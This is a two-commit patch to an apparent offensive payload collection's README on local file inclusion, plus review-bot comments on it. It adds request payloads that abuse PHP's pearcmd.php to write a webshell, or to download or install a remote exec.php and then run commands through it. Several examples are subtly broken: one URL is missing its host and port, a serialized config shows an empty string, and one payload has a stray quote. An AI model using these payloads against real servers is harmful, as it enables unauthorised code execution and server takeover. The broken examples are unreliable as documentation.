From 072cac04d6de1ff1522f9b393f18dcbdf1b16db4 Mon Sep 17 00:00:00 2001 From: Str3am <916525768@qq.com> Date: Wed, 1 Nov 2023 00:26:27 +0800 Subject: [PATCH 1/2] Add two methods about LFI to RCE via PHP PEARCMD --- File Inclusion/README.md | 31 +++++++++++++++++++++++-------- 1 file changed, 23 insertions(+), 8 deletions(-) diff --git a/File Inclusion/README.md b/File Inclusion/README.md index 566245d..99bf3e8 100644 --- a/File Inclusion/README.md +++ b/File Inclusion/README.md @@ -507,7 +507,7 @@ The file `pearcmd.php` uses `$_SERVER['argv']` to get its arguments. The directi register_argc_argv = On ``` -There are two ways to exploit it. +There are this ways to exploit it. * Method 1: config create ```ps1 @@ -519,13 +519,28 @@ There are two ways to exploit it. /vuln.php?file=/usr/local/lib/php/pearcmd.php&+-c+/tmp/exec.php+-d+man_dir=+-s+" /vuln.php?file=/tmp/exec.php&c=id ``` + The created configuration file contains the webshell. + ```php + #PEAR_Config 0.9 + a:2:{s:10:"__channels";a:2:{s:12:"pecl.php.net";a:0:{}s:5:"__uri";a:0:{}}s:7:"man_dir";s:29:"";} + ``` -The created configuration file contains the webshell. - -```php -#PEAR_Config 0.9 -a:2:{s:10:"__channels";a:2:{s:12:"pecl.php.net";a:0:{}s:5:"__uri";a:0:{}}s:7:"man_dir";s:29:"";} -``` +* Method 3: download + + Need external network connection. + ```ps1 + /vuln.php?file=/usr/local/lib/php/pearcmd.php&+download+http://:/exec.php + /vuln.php?file=exec.php&c=id + ``` +* Method 4: install + + Need external network connection. + + Notice that `exec.php` locates at `/tmp/pear/download/exec.php`. + ```ps1 + /vuln.php?file=/usr/local/lib/php/pearcmd.php&+install+http://:/exec.php + /vuln.php?file=/tmp/pear/download/exec.php&c=id + ``` ## LFI to RCE via credentials files 
@@ -581,4 +596,4 @@ If SSH is active check which user is being used `/proc/self/status` and `/etc/pa * [Solving "includer's revenge" from hxp ctf 2021 without controlling any files - @loknop](https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d) * [PHP FILTERS CHAIN: WHAT IS IT AND HOW TO USE IT - Rémi Matasse - 18/10/2022](https://www.synacktiv.com/publications/php-filters-chain-what-is-it-and-how-to-use-it.html) * [PHP FILTER CHAINS: FILE READ FROM ERROR-BASED ORACLE - Rémi Matasse - 21/03/2023](https://www.synacktiv.com/en/publications/php-filter-chains-file-read-from-error-based-oracle.html) -* [One Line PHP: From Genesis to Ragnarök - Ginoah, Bookgin](https://hackmd.io/@ginoah/phpInclude#/) \ No newline at end of file +* [One Line PHP: From Genesis to Ragnarök - Ginoah, Bookgin](https://hackmd.io/@ginoah/phpInclude#/) From 95a85b455d164cc6db624a6da6233d04fa58cf75 Mon Sep 17 00:00:00 2001 From: Str3am <916525768@qq.com> Date: Wed, 1 Nov 2023 00:35:59 +0800 Subject: [PATCH 2/2] Add two methods about LFI to RCE via PHP PEARCMD, and delete extra double quotes in method 2 payload --- File Inclusion/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/File Inclusion/README.md b/File Inclusion/README.md index 99bf3e8..025f1e8 100644 --- a/File Inclusion/README.md +++ b/File Inclusion/README.md @@ -516,7 +516,7 @@ There are this ways to exploit it. ``` * Method 2: man_dir ```ps1 - /vuln.php?file=/usr/local/lib/php/pearcmd.php&+-c+/tmp/exec.php+-d+man_dir=+-s+" + /vuln.php?file=/usr/local/lib/php/pearcmd.php&+-c+/tmp/exec.php+-d+man_dir=+-s+ /vuln.php?file=/tmp/exec.php&c=id ``` The created configuration file contains the webshell.
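Review bot: the first hunk of the first commit turns a correct sentence into a grammatical error; "There are this ways to exploit it." should read "There are four ways to exploit it." now that the list goes up to Method 4 (or simply "There are several ways to exploit it." so the count does not go stale when methods are added later).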
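Review bot: in the second hunk of the first commit, the URLs added for Method 3 and Method 4 read `http://:/exec.php`, so the host and port are missing and the lines are not usable as documentation; write them with a visibly labelled placeholder such as `http://<host>:<port>/exec.php` and say in the "Need external network connection." sentence that this means the vulnerable server must be able to reach that host (which is also what a defender would look for: an outbound HTTP request from the PHP process). The same hunk has two smaller documentation problems: the serialized config shown under Method 2 declares a 29-byte `man_dir` value but renders as `s:29:"";`, so the PHP payload it is meant to illustrate is not visible and the example is internally inconsistent (check that the markdown is escaping the PHP tag rather than swallowing it), and the Method 2 payload line `/vuln.php?file=/usr/local/lib/php/pearcmd.php&+-c+/tmp/exec.php+-d+man_dir=+-s+"` carries a stray trailing `"` that is only removed in the second commit.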
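Review bot: the second commit's single hunk only removes the stray `"` that the first commit added to the Method 2 payload, so it should be squashed into the first commit rather than kept as a separate fix-up, otherwise the history contains a revision with a broken example; if it stays separate, give it a subject that describes only this change instead of repeating "Add two methods about LFI to RCE via PHP PEARCMD" from the first commit.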